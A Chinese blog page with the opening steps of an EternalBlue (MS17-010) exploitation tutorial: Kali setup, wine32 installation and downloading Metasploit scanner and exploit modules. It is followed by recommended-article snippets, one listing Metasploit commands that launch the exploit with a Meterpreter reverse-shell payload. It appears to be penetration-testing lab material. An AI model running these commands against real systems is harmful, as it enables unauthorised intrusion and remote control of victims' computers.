永恒之蓝(EternalBlue)漏洞利用实例

最新推荐文章于 2024-06-02 16:50:45 发布
最新推荐文章于 2024-06-02 16:50:45 发布
阅读量1.7w 收藏 6
点赞数 3
分类专栏: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zz63948992/article/details/72190371
版权
1、升级kali-rolling
a、修改更新源 vim /etc/apt/sources.list,只保留官方更新源“deb http://http.kali.org/kali kali-rolling main non-free contrib”将其他更新源注释掉;

b、更新 apt-get update && apt-get upgrade

2、安装wine32
root@kali:~ wine #提示未安装wine
dpkg --add-architecture i386
apt-get install wine32 && wine update
安装完成后会产生/root/.wine目录。
3、下载扫描模块(smb_ms17_010.rb)和攻击模块(Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb)
扫描模块:
git clone https://github.com/SwordWizard/metasploit-framework/tree/master/modules/auxiliary/scanner/smb/smb_ms17_010

最低0.47元/天 解锁文章
桂华流瓦
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
漏洞利用】使用永恒之蓝的双倍脉冲模块(Eternalblue_doublepulsar)渗透攻击Win_7 32位主机
ATree的博客
12-20 1万+
使用这个模块本来是用来做攻击测试的,但是我始终没有测试成功,我大概花了1天半的时间,一直在研究为什么网上的文章里都显示测试成功了,我的就没有成功,一直在找原因,因为除了时间上的差异,kali模块增多,高版本的wine32软件,我真的不知道到底问题出在哪里了,就真的只好从这些方面入手去排查,从问题出发找原因,这个真的需要耐心,毅力。 我写的详细些,大家也就看的明白,这样就能保证你一次成功的概率比较...
E+D:eternalblue+Doublepulsar
Amdy_amdy的博客
09-26 820
靶机:192.168.6.39(windows server 2008 与windows 7测试过,没有问题) 攻击机:192.168.6.42 参考链接 http://www.duorenwei.com/news/5316.html https://www.t00ls.net/viewthread.php?tid=39343&highlight=%E6%96%B9%E7%A8%8...
永恒之蓝 (EternalBlue) 漏洞利用原理详解
最新发布
volta_xu的博客
06-02 738
SMB(Server Message Block)协议是一种网络文件共享协议,主要用于文件和打印机共享。SMB协议允许客户端通过网络访问服务器上的文件、目录和其他资源。在Windows中,SMB协议是默认启用的,用于提供文件共享服务。
MS17-010永恒之蓝漏洞利用(windows7 32位)
逍遥小哥的博客
01-11 627
第二步:把Eternalblue-Doublepulsar-Metasploit文件中的eternalblue_doublepulsar.rb 拷贝到/usr/share/metasploit-framework/modules/exploits/windows/smb。sudo dpkg --add-architecture i386 (开启 32 位架构支持)sudo apt install --install-recommends wine 安装。然后安装win 32架构。接下来开始用msf来打。
Eternalblue-Doublepulsar-Metasploit-master
05-11
Eternalblue-Doublepulsar-Metasploit-master
永恒之蓝EternalBlue/Wannacry分析
12-24
永恒之蓝EternalBlue/Wannacry分析
永恒之蓝(ms17010)漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以...
win2012R2永恒之蓝安全补丁.zip
05-12
KB4012213是针对Windows 8.1和Windows Server 2012 R2的一个安全更新,修复了永恒之蓝利用的SMBv1漏洞。这个补丁不仅堵住了漏洞,还增强了系统的安全性,降低了被恶意软件感染的风险。安装KB4012213后,系统可以防止...
网安永恒之蓝检测工具
04-02
总的来说,"网安永恒之蓝检测工具"是针对MS17-010漏洞的一款重要防御工具,它的存在帮助用户和管理员能够及时识别并修复可能被永恒之蓝利用的系统,从而提高网络安全防护能力。定期使用此类工具进行检测,可以有效...
eternalblue原理
11-25
关于eternalblue原理的详解,写得详细,对于理解此技术很有帮助
eternalblue_doublepulsar
11-25
这才是最纯正的eternalblue_doublepulsar!!!!!!!
Eternalblue-Doublepulsar-Metasploit:利用漏洞Eternalblue-Doublepulsar的Metasploit模块
05-02
永恒的蓝色-双脉冲星-元宝 本软件按“原样”提供,不提供任何形式的明示或暗示担保,包括但不限于对适销性,特定目的的适用性和非侵权性的担保。 无论是由于软件,使用或其他方式产生的,与之有关或与之有关的合同,侵权或其他形式的任何索赔,损害或其他责任,作者或版权所有者概不负责。软件。
EternalBlue永恒之蓝渗透测试.html
03-02
永恒之蓝漏洞渗透测试
浅析ms17_010(永恒之蓝漏洞利用过程及防护措施
qq_24797991的博客
03-27 4030
永恒之蓝勒索病毒漏洞复现及防范
Metasploit渗透测试(双脉冲星)
Aluxian_的博客
04-21 1636
MS17-010(EternalBlue) 靶机:win7:service Pack1 172.16.5.201 靶机下载 攻击机:kali 172.16.5.158 而且要保证两台机器之间可以ping通 因为kali里面没有这个rb源代码 所以我们要把这个模块导入进去 我们先要smb模块下载到这里面 #cd /usr/share/metasploit-framework/modules/exploits/windows/smb #https://github.com/1stPeak/Eternalb
永恒之蓝漏洞
m0_73481504的博客
03-26 696
利用漏洞ms17-010漏洞 攻击对方主机进行文件数据的修改需要2台主机 server2008 ,kali第一步,打开两台主机 先要知道被攻击者的ip地址第二步, 打开kali对其ip地址进行扫描扫描ip地址的全部端口 nmap -sV -p- +ip地址nmap -sV -O +ip地址 查看对方系统的版本信息-O识别系统版本-sV 识别具体服务版本扫描到永恒之蓝第三步 ,找到漏洞 利用漏洞启动msf使用ms17_010攻击成功 ps 查看对方开启的进程查看对方主机界面。
MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
热门推荐
linxaiomo
02-20 1万+
漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9 攻击机:kali linux (X64) ip:192.168.1.101 使用工具:meatsploit,nmap 前期准备工作:由于kali是64位,如果windows 7 是32 位,所以我们得安装wine3...
怎么知道主机是否有永恒之蓝的漏洞
06-10
要确定主机是否存在永恒之蓝漏洞,您可以使用以下工具: 1. Nmap 使用Nmap扫描主机,然后查看扫描结果中是否存在以下端口开放: - TCP端口 445 - TCP端口 139 如果这些端口开放,则可能存在永恒之蓝漏洞。 2. Metasploit Metasploit是一款开源渗透测试工具。您可以使用Metasploit来测试主机是否存在永恒之蓝漏洞。具体步骤如下: - 打开Metasploit控制台。 - 输入命令:`use exploit/windows/smb/ms17_010_eternalblue`,然后按Enter键。 - 输入命令:`set RHOSTS <目标主机IP>`,然后按Enter键。 - 输入命令:`set PAYLOAD windows/x64/meterpreter/reverse_tcp`(如果目标主机是32位系统,则使用`windows/meterpreter/reverse_tcp`),然后按Enter键。 - 输入命令:`run`,然后按Enter键。 如果命令执行成功,则意味着目标主机存在永恒之蓝漏洞。 请注意,在测试之前请务必取得合法授权。测试时请勿将工具用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值